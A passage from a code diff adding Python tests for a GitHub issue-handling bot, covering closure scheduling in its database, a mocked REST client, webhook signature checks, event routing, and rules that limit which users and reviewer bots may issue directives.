db.upsert_pending_closure( + issue_key=_KEY, + repo="octo/widget", + number=42, + comment_id=999, + issue_author="Alice", + close_at=close_at, + ) + + +def test_upsert_pending_closure_lowercases_author_and_starts_pending(db: Database) -> None: + _seed_pending(db) + row = db.get_pending_closure(_KEY) + assert row is not None + assert row.state == "pending" + assert row.cancel_reason is None + assert row.issue_author == "alice" # author stored lower-cased for cheap eq + assert row.comment_id == 999 + + +def test_upsert_pending_closure_overwrites_prior_schedule(db: Database) -> None: + _seed_pending(db) + db.finalize_closure(_KEY, state="cancelled", reason="user_replied") + # A follow-up bot answer should reset the row to pending and update fields. + db.upsert_pending_closure( + issue_key=_KEY, + repo="octo/widget", + number=42, + comment_id=1234, + issue_author="alice", + close_at="2030-01-01T00:00:00.000000Z", + ) + row = db.get_pending_closure(_KEY) + assert row is not None + assert row.state == "pending" + assert row.cancel_reason is None + assert row.comment_id == 1234 + assert row.close_at == "2030-01-01T00:00:00.000000Z" + + +def test_claim_due_closures_only_returns_due_pending(db: Database) -> None: + _seed_pending(db, close_at="2000-01-01T00:00:00.000000Z") # past + db.upsert_pending_closure( + issue_key=issue_key("octo/widget", 7), + repo="octo/widget", + number=7, + comment_id=10, + issue_author="bob", + close_at="2999-01-01T00:00:00.000000Z", # future + ) + claimed = db.claim_due_closures(now="2026-05-15T00:00:00.000000Z") + assert [r.issue_key for r in claimed] == [_KEY] + assert all(r.state == "claimed" for r in claimed) + # And re-claiming returns nothing because the first one is no longer pending. + again = db.claim_due_closures(now="2026-05-15T00:00:00.000000Z") + assert again == [] + + +def test_claim_due_closures_atomic_under_contention(db: Database) -> None: + """Two concurrent claims see disjoint rows.""" + for n in range(5): + db.upsert_pending_closure( + issue_key=issue_key("octo/widget", n), + repo="octo/widget", + number=n, + comment_id=100 + n, + issue_author="alice", + close_at="2000-01-01T00:00:00.000000Z", + ) + seen: list[str] = [] + lock = threading.Lock() + + def claim_some() -> None: + rows = db.claim_due_closures(now="2026-05-15T00:00:00.000000Z", limit=2) + with lock: + seen.extend(r.issue_key for r in rows) + + with ThreadPoolExecutor(max_workers=4) as pool: + for _ in range(4): + list(pool.map(lambda _: claim_some(), range(4))) + # Each row must appear at most once across all claims. + assert sorted(seen) == sorted({issue_key("octo/widget", n) for n in range(5)}) + + +def test_cancel_pending_closure_only_fires_when_pending(db: Database) -> None: + _seed_pending(db) + assert db.cancel_pending_closure(_KEY, reason="user_replied") + row = db.get_pending_closure(_KEY) + assert row is not None + assert row.state == "cancelled" + assert row.cancel_reason == "user_replied" + # A second cancel against an already-cancelled row is a no-op. + assert not db.cancel_pending_closure(_KEY, reason="user_replied") + + +def test_cancel_pending_closure_skips_claimed_rows(db: Database) -> None: + """A `claimed` row must be left for the scheduler tick that owns it.""" + _seed_pending(db, close_at="2000-01-01T00:00:00.000000Z") + claimed = db.claim_due_closures(now="2026-05-15T00:00:00.000000Z") + assert claimed and claimed[0].state == "claimed" + assert not db.cancel_pending_closure(_KEY, reason="user_replied") + row = db.get_pending_closure(_KEY) + assert row is not None and row.state == "claimed" + + +def test_finalize_closure_rejects_non_terminal_state(db: Database) -> None: + _seed_pending(db) + import pytest + + with pytest.raises(ValueError): + db.finalize_closure(_KEY, state="pending", reason=None) # type: ignore[arg-type] + + +def test_requeue_claimed_closure_only_flips_claimed(db: Database) -> None: + _seed_pending(db, close_at="2000-01-01T00:00:00.000000Z") + db.claim_due_closures(now="2026-05-15T00:00:00.000000Z") + assert db.requeue_claimed_closure(_KEY) + row = db.get_pending_closure(_KEY) + assert row is not None and row.state == "pending" + # Now in pending state, requeue is a no-op. + assert not db.requeue_claimed_closure(_KEY) diff --git a/python/robomp/tests/test_github_client.py b/python/robomp/tests/test_github_client.py new file mode 100644 index 000000000..9da1d4ce4 --- /dev/null +++ b/python/robomp/tests/test_github_client.py @@ -0,0 +1,222 @@ +"""GitHub REST client tests against httpx.MockTransport.""" + +from __future__ import annotations + +import asyncio + +import httpx +import pytest + +from robomp.github_client import GitHubClient, GitHubError + + +def _run_async(coro): + return asyncio.new_event_loop().run_until_complete(coro) + + +def test_4xx_maps_to_github_error_with_message() -> None: + transport = httpx.MockTransport(lambda req: httpx.Response(404, json={"message": "Not Found"})) + client = GitHubClient("tok", transport=transport) + with pytest.raises(GitHubError) as exc: + asyncio.new_event_loop().run_until_complete(client.get_repo("o/r")) + assert exc.value.status == 404 + assert "Not Found" in str(exc.value) + + +def test_rate_limit_retry_after_parsed() -> None: + transport = httpx.MockTransport( + lambda req: httpx.Response( + 403, + json={"message": "rate limited"}, + headers={"retry-after": "42"}, + ) + ) + client = GitHubClient("tok", transport=transport) + with pytest.raises(GitHubError) as exc: + asyncio.new_event_loop().run_until_complete(client.get_repo("o/r")) + assert exc.value.retry_after == 42.0 + + +def test_redirect_without_follow_raises_github_error() -> None: + """If a moved repo returns 301 and the redirect target is unreachable, + we must raise a clean GitHubError instead of parsing the response body.""" + calls: list[str] = [] + + def handler(request: httpx.Request) -> httpx.Response: + calls.append(str(request.url)) + # First request: simulate a 301 redirect that the client cannot follow + # because the new location resolves to a 410 Gone. + if len(calls) == 1: + return httpx.Response( + 301, + headers={"location": "https://api.github.com/repositories/12345"}, + ) + return httpx.Response(410, json={"message": "Gone"}) + + transport = httpx.MockTransport(handler) + client = GitHubClient("tok", transport=transport) + with pytest.raises(GitHubError) as exc: + asyncio.new_event_loop().run_until_complete(client.get_repo("old-owner/old-repo")) + # Either we end up at 410 after following, or we surface the redirect itself + # — both are GitHubError, not an internal exception. + assert exc.value.status in (301, 410) + + +def test_redirect_target_succeeds_when_followable() -> None: + """A 301 → 200 chain should resolve to the followed payload.""" + + def handler(request: httpx.Request) -> httpx.Response: + if request.url.path == "/repos/old/repo": + return httpx.Response( + 301, + headers={"location": "https://api.github.com/repos/new/repo"}, + ) + return httpx.Response( + 200, + json={ + "full_name": "new/repo", + "default_branch": "main", + "clone_url": "https://github.com/new/repo.git", + "private": False, + }, + ) + + transport = httpx.MockTransport(handler) + client = GitHubClient("tok", transport=transport) + repo = asyncio.new_event_loop().run_until_complete(client.get_repo("old/repo")) + assert repo.full_name == "new/repo" + + +def test_get_pull_request_parses_head_repo_and_author() -> None: + def handler(request: httpx.Request) -> httpx.Response: + assert request.url.path == "/repos/octo/widget/pulls/9" + return httpx.Response( + 200, + json={ + "number": 9, + "html_url": "https://github.com/octo/widget/pull/9", + "head": {"ref": "farm/abc12345/fix", "repo": {"full_name": "octo/widget"}}, + "base": {"ref": "main"}, + "state": "open", + "user": {"login": "robomp-bot"}, + }, + ) + + client = GitHubClient("tok", transport=httpx.MockTransport(handler)) + pr = _run_async(client.get_pull_request("octo/widget", 9)) + assert pr.head_ref == "farm/abc12345/fix" + assert pr.head_repo == "octo/widget" + assert pr.author == "robomp-bot" + + +def test_204_no_content_returns_none() -> None: + transport = httpx.MockTransport(lambda r: httpx.Response(204)) + client = GitHubClient("tok", transport=transport) + # add_assignees with empty list short-circuits without a request; pass one to force the call. + asyncio.new_event_loop().run_until_complete(client.add_assignees("o/r", 1, ["alice"])) + + +def test_list_closing_pull_requests_filters_disconnected_and_closed() -> None: + """Net connected−disconnected open PRs only.""" + captured: dict[str, str] = {} + + timeline = [ + # PR #100 connected and still open → included + { + "event": "connected", + "source": {"issue": {"number": 100, "state": "open", "pull_request": {"url": "..."}}}, + }, + # PR #200 connected then disconnected → excluded + { + "event": "connected", + "source": {"issue": {"number": 200, "state": "open", "pull_request": {"url": "..."}}}, + }, + { + "event": "disconnected", + "source": {"issue": {"number": 200, "state": "open", "pull_request": {"url": "..."}}}, + }, + # PR #300 connected but currently closed (e.g. rejected) → excluded + { + "event": "connected", + "source": {"issue": {"number": 300, "state": "closed", "pull_request": {"url": "..."}}}, + }, + # Cross-referenced (not connected) — not a closing link → excluded + { + "event": "cross-referenced", + "source": {"issue": {"number": 400, "state": "open", "pull_request": {"url": "..."}}}, + }, + # Plain issue cross-ref (no pull_request) → excluded + { + "event": "connected", + "source": {"issue": {"number": 500, "state": "open"}}, + }, + # Unrelated timeline events → ignored + {"event": "labeled", "label": {"name": "bug"}}, + ] + + def handler(request: httpx.Request) -> httpx.Response: + captured["path"] = request.url.path + captured["per_page"] = request.url.params.get("per_page", "") + return httpx.Response(200, json=timeline) + + client = GitHubClient("tok", transport=httpx.MockTransport(handler)) + prs = _run_async(client.list_closing_pull_requests("octo/widget", 42)) + assert prs == (100,) + assert captured["path"] == "/repos/octo/widget/issues/42/timeline" + assert captured["per_page"] == "100" + + +def test_list_closing_pull_requests_empty_timeline() -> None: + transport = httpx.MockTransport(lambda r: httpx.Response(200, json=[])) + client = GitHubClient("tok", transport=transport) + assert _run_async(client.list_closing_pull_requests("octo/widget", 7)) == () + + +def test_list_comment_reactions_filters_to_thumbs_down() -> None: + captured: dict[str, str] = {} + + def handler(request: httpx.Request) -> httpx.Response: + captured["path"] = request.url.path + captured["content"] = request.url.params.get("content", "") + captured["per_page"] = request.url.params.get("per_page", "") + return httpx.Response( + 200, + json=[ + {"content": "-1", "user": {"login": "Alice", "type": "User"}}, + {"content": "-1", "user": {"login": "rando", "type": "User"}}, + ], + ) + + client = GitHubClient("tok", transport=httpx.MockTransport(handler)) + reactions = _run_async(client.list_comment_reactions("octo/widget", 999)) + assert captured["path"] == "/repos/octo/widget/issues/comments/999/reactions" + assert captured["content"] == "-1" + assert captured["per_page"] == "100" + assert tuple(r.user_login for r in reactions) == ("Alice", "rando") + assert all(r.content == "-1" for r in reactions) + + +def test_close_issue_sends_completed_state_reason() -> None: + captured: dict[str, object] = {} + + def handler(request: httpx.Request) -> httpx.Response: + import json + + captured["method"] = request.method + captured["path"] = request.url.path + captured["body"] = json.loads(request.content) + return httpx.Response(200, json={}) + + client = GitHubClient("tok", transport=httpx.MockTransport(handler)) + assert _run_async(client.close_issue("octo/widget", 42)) is None + assert captured["method"] == "PATCH" + assert captured["path"] == "/repos/octo/widget/issues/42" + assert captured["body"] == {"state": "closed", "state_reason": "completed"} + + +def test_close_issue_propagates_error() -> None: + transport = httpx.MockTransport(lambda r: httpx.Response(404, json={"message": "Not Found"})) + client = GitHubClient("tok", transport=transport) + with pytest.raises(GitHubError) as exc: + _run_async(client.close_issue("octo/widget", 42)) + assert exc.value.status == 404 diff --git a/python/robomp/tests/test_github_events.py b/python/robomp/tests/test_github_events.py new file mode 100644 index 000000000..0ec4391c9 --- /dev/null +++ b/python/robomp/tests/test_github_events.py @@ -0,0 +1,736 @@ +from __future__ import annotations + +import hashlib +import hmac + +from robomp.github_events import ( + extract_mention, + is_maintainer, + rate_limit_cap, + route, + verify_signature, +) + +ALLOWLIST = frozenset({"octo/widget"}) +BOT = "robomp-bot" + + +def test_verify_signature_positive() -> None: + secret = "shh" + body = b'{"x":1}' + sig = hmac.new(secret.encode(), body, hashlib.sha256).hexdigest() + assert verify_signature(secret, body, f"sha256={sig}") + + +def test_verify_signature_rejects_missing_header() -> None: + assert not verify_signature("shh", b"{}", None) + assert not verify_signature("shh", b"{}", "") + assert not verify_signature("shh", b"{}", "md5=deadbeef") + + +def test_verify_signature_rejects_wrong_secret() -> None: + body = b'{"x":1}' + sig = hmac.new(b"right", body, hashlib.sha256).hexdigest() + assert not verify_signature("wrong", body, f"sha256={sig}") + + +def test_route_issue_opened_queues_triage() -> None: + decision = route( + "issues", + { + "action": "opened", + "issue": {"number": 4, "user": {"login": "alice"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.should_queue + assert decision.task == "triage_issue" + assert decision.issue_key == "octo/widget#4" + + +def test_route_skips_disallowed_repo() -> None: + decision = route( + "issues", + {"action": "opened", "issue": {"number": 1}, "repository": {"full_name": "other/repo"}}, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert not decision.should_queue + assert "allowlist" in decision.reason + + +def test_route_skips_self_comment() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": {"user": {"login": BOT}, "body": "hi"}, + "issue": {"number": 4}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert not decision.should_queue + + +def test_route_skips_bot_suffix_comment() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": {"user": {"login": "github-actions[bot]", "type": "Bot"}, "body": "ci ran"}, + "issue": {"number": 4}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert not decision.should_queue + assert "bot" in decision.reason + + +def test_route_skips_user_type_bot() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": {"user": {"login": "renovate", "type": "Bot"}, "body": "deps"}, + "issue": {"number": 4}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert not decision.should_queue + + +def test_route_comment_routes_handle_comment() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": {"user": {"login": "alice"}, "body": "hi"}, + "issue": {"number": 4}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.should_queue + assert decision.task == "handle_comment" + assert decision.issue_key == "octo/widget#4" + + +def test_route_pr_conversation_uses_handle_pr_conversation() -> None: + """A regular comment on a PR (not a review) must NOT route to handle_review.""" + decision = route( + "issue_comment", + { + "action": "created", + "comment": {"user": {"login": "alice"}, "body": "looks good"}, + "issue": {"number": 9, "pull_request": {"url": "x"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.should_queue + assert decision.task == "handle_pr_conversation" + + +def test_route_pr_conversation_uses_resolver_for_inflight_key() -> None: + """PR-derived events MUST serialize on the originating issue's key.""" + + def resolver(repo: str, pr_number: int) -> str | None: + assert repo == "octo/widget" + assert pr_number == 9 + return "octo/widget#42" + + decision = route( + "issue_comment", + { + "action": "created", + "comment": {"user": {"login": "alice"}, "body": "looks good"}, + "issue": {"number": 9, "pull_request": {"url": "x"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=resolver, + ) + assert decision.should_queue + # Same key as if the user had commented on issue #42 directly. + assert decision.issue_key == "octo/widget#42" + + +def test_route_pr_conversation_falls_back_to_pr_key_when_resolver_misses() -> None: + """Unmapped PR comments still queue so the worker can recover from the PR branch.""" + + decision = route( + "issue_comment", + { + "action": "created", + "comment": {"user": {"login": "alice"}, "body": "hi"}, + "issue": {"number": 9, "pull_request": {"url": "x"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: None, + ) + assert decision.should_queue + assert decision.task == "handle_pr_conversation" + assert decision.submitter == "alice" + assert decision.issue_key == "octo/widget#9" + + +def test_route_review_only_for_bot_authored_pr() -> None: + decision = route( + "pull_request_review_comment", + { + "action": "created", + "comment": {"user": {"login": "alice"}, "body": "nit"}, + "pull_request": {"number": 9, "user": {"login": BOT}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.should_queue + assert decision.task == "handle_review" + assert decision.issue_key == "octo/widget#42" + + not_ours = route( + "pull_request_review_comment", + { + "action": "created", + "comment": {"user": {"login": "alice"}, "body": "nit"}, + "pull_request": {"number": 9, "user": {"login": "someone-else"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert not not_ours.should_queue + + +def test_route_review_comment_falls_back_to_pr_key_when_resolver_misses() -> None: + decision = route( + "pull_request_review_comment", + { + "action": "created", + "comment": {"user": {"login": "alice"}, "body": "nit"}, + "pull_request": {"number": 9, "user": {"login": BOT}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: None, + ) + assert decision.should_queue + assert decision.task == "handle_review" + assert decision.submitter == "alice" + assert decision.issue_key == "octo/widget#9" + + +def test_route_pr_closed_only_when_merged_by_bot() -> None: + payload = { + "action": "closed", + "pull_request": {"number": 9, "user": {"login": BOT}, "merged": True}, + "repository": {"full_name": "octo/widget"}, + } + decision = route( + "pull_request", + payload, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.should_queue + assert decision.task == "cleanup_workspace" + assert decision.issue_key == "octo/widget#42" + + fallback = route( + "pull_request", + payload, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: None, + ) + assert fallback.should_queue + assert fallback.task == "cleanup_workspace" + assert fallback.issue_key == "octo/widget#9" + assert fallback.submitter is None + + payload["pull_request"]["merged"] = False # type: ignore[index] + assert not route("pull_request", payload, allowlist=ALLOWLIST, bot_login=BOT).should_queue + + +def test_route_skips_pull_request_issues_event() -> None: + decision = route( + "issues", + { + "action": "opened", + "issue": {"number": 4, "pull_request": {"url": "x"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert not decision.should_queue + + +def test_route_issue_opened_captures_submitter() -> None: + decision = route( + "issues", + { + "action": "opened", + "issue": { + "number": 4, + "user": {"login": "alice"}, + "author_association": "FIRST_TIME_CONTRIBUTOR", + }, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.submitter == "alice" + assert decision.association == "FIRST_TIME_CONTRIBUTOR" + + +def test_route_comment_captures_comment_author_association() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "bob"}, + "body": "hi", + "author_association": "CONTRIBUTOR", + }, + "issue": {"number": 4}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.submitter == "bob" + assert decision.association == "CONTRIBUTOR" + + +def test_route_pr_merged_carries_no_submitter() -> None: + """Lifecycle events (cleanup on merge) are not user submissions.""" + payload = { + "action": "closed", + "pull_request": {"number": 9, "user": {"login": BOT}, "merged": True}, + "repository": {"full_name": "octo/widget"}, + } + decision = route( + "pull_request", + payload, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.should_queue + assert decision.submitter is None + + +def test_rate_limit_cap_unlimited_allowlist_beats_association() -> None: + # Even a NONE association is unlimited when login is in the explicit list. + assert ( + rate_limit_cap( + "can1357", + "NONE", + unlimited=frozenset({"can1357"}), + default=3, + contributor=10, + ) + is None + ) + + +def test_rate_limit_cap_unlimited_is_case_insensitive() -> None: + assert ( + rate_limit_cap( + "Can1357", + None, + unlimited=frozenset({"can1357"}), + default=3, + contributor=10, + ) + is None + ) + + +def test_rate_limit_cap_trusted_associations_bypass() -> None: + for assoc in ("OWNER", "MEMBER", "COLLABORATOR"): + assert ( + rate_limit_cap( + "stranger", + assoc, + unlimited=frozenset(), + default=3, + contributor=10, + ) + is None + ), assoc + + +def test_rate_limit_cap_contributor_tier() -> None: + assert ( + rate_limit_cap( + "alice", + "CONTRIBUTOR", + unlimited=frozenset(), + default=3, + contributor=10, + ) + == 10 + ) + + +def test_rate_limit_cap_default_tier_for_unknown_and_first_timer() -> None: + for assoc in (None, "NONE", "FIRST_TIME_CONTRIBUTOR", "FIRST_TIMER"): + assert ( + rate_limit_cap( + "alice", + assoc, + unlimited=frozenset(), + default=3, + contributor=10, + ) + == 3 + ), assoc + + +# ---------- mention + directive ---------- + + +def test_extract_mention_returns_body_minus_mention() -> None: + assert extract_mention("hey @robomp-bot please look", "robomp-bot") == "hey please look" + assert extract_mention("@robomp-bot do X", "robomp-bot") == "do X" + + +def test_extract_mention_returns_none_without_mention() -> None: + assert extract_mention("hello there", "robomp-bot") is None + assert extract_mention(None, "robomp-bot") is None + assert extract_mention("", "robomp-bot") is None + + +def test_extract_mention_is_case_insensitive() -> None: + assert extract_mention("yo @ROBOMP-BOT", "robomp-bot") == "yo" + + +def test_extract_mention_respects_hyphen_word_boundary() -> None: + # @robomp-bot-helper must NOT match @robomp-bot. + assert extract_mention("@robomp-bot-helper hi", "robomp-bot") is None + + +def test_extract_mention_handles_multiple_occurrences() -> None: + assert extract_mention("@robomp-bot one, then @robomp-bot two", "robomp-bot") == "one, then two" + + +def test_is_maintainer_recognizes_explicit_allowlist() -> None: + assert is_maintainer("can1357", None, maintainers=frozenset({"can1357"})) + assert is_maintainer("Can1357", "NONE", maintainers=frozenset({"can1357"})) + + +def test_is_maintainer_recognizes_trusted_associations() -> None: + for assoc in ("OWNER", "MEMBER", "COLLABORATOR"): + assert is_maintainer("anyone", assoc, maintainers=frozenset()), assoc + + +def test_is_maintainer_rejects_contributor_and_none() -> None: + assert not is_maintainer("alice", "CONTRIBUTOR", maintainers=frozenset()) + assert not is_maintainer("alice", None, maintainers=frozenset()) + assert is_maintainer(None, "OWNER", maintainers=frozenset()) # association still wins + + +def test_route_directive_set_on_issue_comment_when_owner_mentions_bot() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "can1357"}, + "author_association": "OWNER", + "body": "@robomp-bot please refactor X", + }, + "issue": {"number": 9}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.should_queue + assert decision.directive is True + assert decision.directive_body == "please refactor X" + assert decision.directive_author == "can1357" + + +def test_route_directive_set_when_login_in_maintainers_list() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "can1357"}, + # No author_association field. + "body": "@robomp-bot do it", + }, + "issue": {"number": 9}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + maintainers=frozenset({"can1357"}), + ) + assert decision.directive is True + assert decision.directive_body == "do it" + assert decision.directive_author == "can1357" + + +def test_route_directive_unset_for_random_user_even_with_mention() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "stranger"}, + "author_association": "NONE", + "body": "@robomp-bot please refactor X", + }, + "issue": {"number": 9}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.should_queue # comment still routed normally + assert decision.directive is False + assert decision.directive_body is None + + +def test_route_directive_unset_for_maintainer_without_mention() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "can1357"}, + "author_association": "OWNER", + "body": "looks good to me", + }, + "issue": {"number": 9}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.directive is False + + +def test_route_directive_set_on_pr_conversation() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "can1357"}, + "author_association": "OWNER", + "body": "@robomp-bot change the indentation in foo.py", + }, + "issue": {"number": 50, "pull_request": {"url": "x"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.should_queue + assert decision.task == "handle_pr_conversation" + assert decision.directive is True + assert decision.directive_body == "change the indentation in foo.py" + + +def test_route_directive_set_on_review_comment() -> None: + decision = route( + "pull_request_review_comment", + { + "action": "created", + "comment": { + "user": {"login": "can1357"}, + "author_association": "OWNER", + "body": "@robomp-bot use a generator here", + }, + "pull_request": {"number": 50, "user": {"login": BOT}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.should_queue + assert decision.task == "handle_review" + assert decision.directive is True + assert decision.directive_body == "use a generator here" + + +# ---------- reviewer bots ---------- + + +def test_route_reviewer_bot_comment_is_directive_without_mention() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "chatgpt-codex-connector", "type": "Bot"}, + "body": "Found two issues in the diff: ...", + }, + "issue": {"number": 9, "pull_request": {"url": "x"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + reviewer_bots=frozenset({"chatgpt-codex-connector"}), + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.should_queue + assert decision.task == "handle_pr_conversation" + assert decision.directive is True + assert decision.directive_body == "Found two issues in the diff: ..." + assert decision.directive_author == "chatgpt-codex-connector" + + +def test_route_reviewer_bot_review_comment_is_directive() -> None: + decision = route( + "pull_request_review_comment", + { + "action": "created", + "comment": { + "user": {"login": "chatgpt-codex-connector", "type": "Bot"}, + "body": "This branch leaks memory.", + }, + "pull_request": {"number": 50, "user": {"login": BOT}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + reviewer_bots=frozenset({"chatgpt-codex-connector"}), + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.should_queue + assert decision.task == "handle_review" + assert decision.directive is True + assert decision.directive_body == "This branch leaks memory." + assert decision.directive_author == "chatgpt-codex-connector" + + +def test_route_random_bot_still_skipped_when_not_in_reviewer_list() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": {"user": {"login": "renovate", "type": "Bot"}, "body": "deps"}, + "issue": {"number": 9}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + reviewer_bots=frozenset({"chatgpt-codex-connector"}), + ) + assert not decision.should_queue + assert "bot" in decision.reason + + +def test_route_reviewer_bot_login_case_insensitive() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "ChatGPT-Codex-Connector", "type": "Bot"}, + "body": "feedback", + }, + "issue": {"number": 9, "pull_request": {"url": "x"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + reviewer_bots=frozenset({"chatgpt-codex-connector"}), + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.directive is True + assert decision.directive_author == "chatgpt-codex-connector" + + +def test_route_directive_strips_pragmas_from_maintainer_comment() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "can1357"}, + "author_association": "OWNER", + "body": "@robomp-bot /model gpt /thinking low\nrefactor X", + }, + "issue": {"number": 9}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.directive is True + assert decision.directive_body == "refactor X" + assert decision.directive_pragmas == (("model", "gpt"), ("thinking", "low")) + + +def test_route_directive_strips_pragmas_from_reviewer_bot_comment() -> None: + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "chatgpt-codex-connector", "type": "Bot"}, + "body": "/model claude\nLeak in foo()", + }, + "issue": {"number": 9, "pull_request": {"url": "x"}}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + reviewer_bots=frozenset({"chatgpt-codex-connector"}), + resolve_issue_from_pr=lambda _r, _n: "octo/widget#42", + ) + assert decision.directive is True + assert decision.directive_body == "Leak in foo()" + assert decision.directive_pragmas == (("model", "claude"),) + + +def test_route_non_directive_comment_carries_no_pragmas() -> None: + # Random user pragmas must NOT propagate — only directive comments do. + decision = route( + "issue_comment", + { + "action": "created", + "comment": { + "user": {"login": "stranger"}, + "author_association": "NONE", + "body": "/model gpt\nhello", + }, + "issue": {"number": 9}, + "repository": {"full_name": "octo/widget"}, + }, + allowlist=ALLOWLIST, + bot_login=BOT, + ) + assert decision.directive is False + assert decision.directive_pragmas == () diff --git a/python/robomp/tests/test_host_tools.py b/python/robomp/tests/test_host_tools.py new file mode 100644 index 000000000..433ee37b9 --- /dev/null +++ b/python/robomp/tests/test_host_tools.py @@ -0,0 +1,2858 @@ +"""Host tool tests against a mocked GitHub via httpx.MockTransport.""" + +from __future__ import annotations + +import asyncio +import json +import threading +from pathlib import Path +from typing import Any + +import httpx +import pytest +from omp_rpc import HostToolContext, RpcCommandError + +from robomp import host_tools +from robomp.db import Database +from robomp.github_client import GitHubClient, IssueInfo, RepoInfo +from robomp.host_tools import AbortController, ToolBindings, build +from robomp.sandbox import LocalGitTransport, Workspace + + +def _stub_workspace(tmp_path: Path) -> Workspace: + root = tmp_path / "ws" + repo_dir = root / "repo" + session_dir = root / ".omp-session" + context_dir = root / "context" + artifacts_dir = root / "artifacts" + for p in (root, repo_dir, session_dir, context_dir, context_dir / "repro", artifacts_dir): + p.mkdir(parents=True, exist_ok=True) + return Workspace( + root=root, + repo_dir=repo_dir, + session_dir=session_dir, + context_dir=context_dir, + artifacts_dir=artifacts_dir, + branch="farm/abc12345/some-issue", + repo_full_name="octo/widget", + issue_number=42, + ) + + +def _stub_issue() -> IssueInfo: + return IssueInfo( + repo="octo/widget", + number=42, + title="boom", + body="b", + state="open", + author="alice", + labels=("bug",), + is_pull_request=False, + ) + + +def _stub_repo() -> RepoInfo: + return RepoInfo( + full_name="octo/widget", + default_branch="main", + clone_url="https://x/octo/widget.git", + private=False, + ) + + +def _make_loop_in_background() -> tuple[asyncio.AbstractEventLoop, threading.Thread]: + loop = asyncio.new_event_loop() + t = threading.Thread(target=loop.run_forever, daemon=True) + t.start() + return loop, t + + +def _stop_loop(loop: asyncio.AbstractEventLoop, t: threading.Thread) -> None: + loop.call_soon_threadsafe(loop.stop) + t.join(timeout=2.0) + loop.close() + + +def _bindings( + db: Database, tmp_path: Path, transport: httpx.MockTransport, *, slot_uid: int | None = None +) -> tuple[ToolBindings, asyncio.AbstractEventLoop, threading.Thread]: + github = GitHubClient("token", transport=transport) + loop, thread = 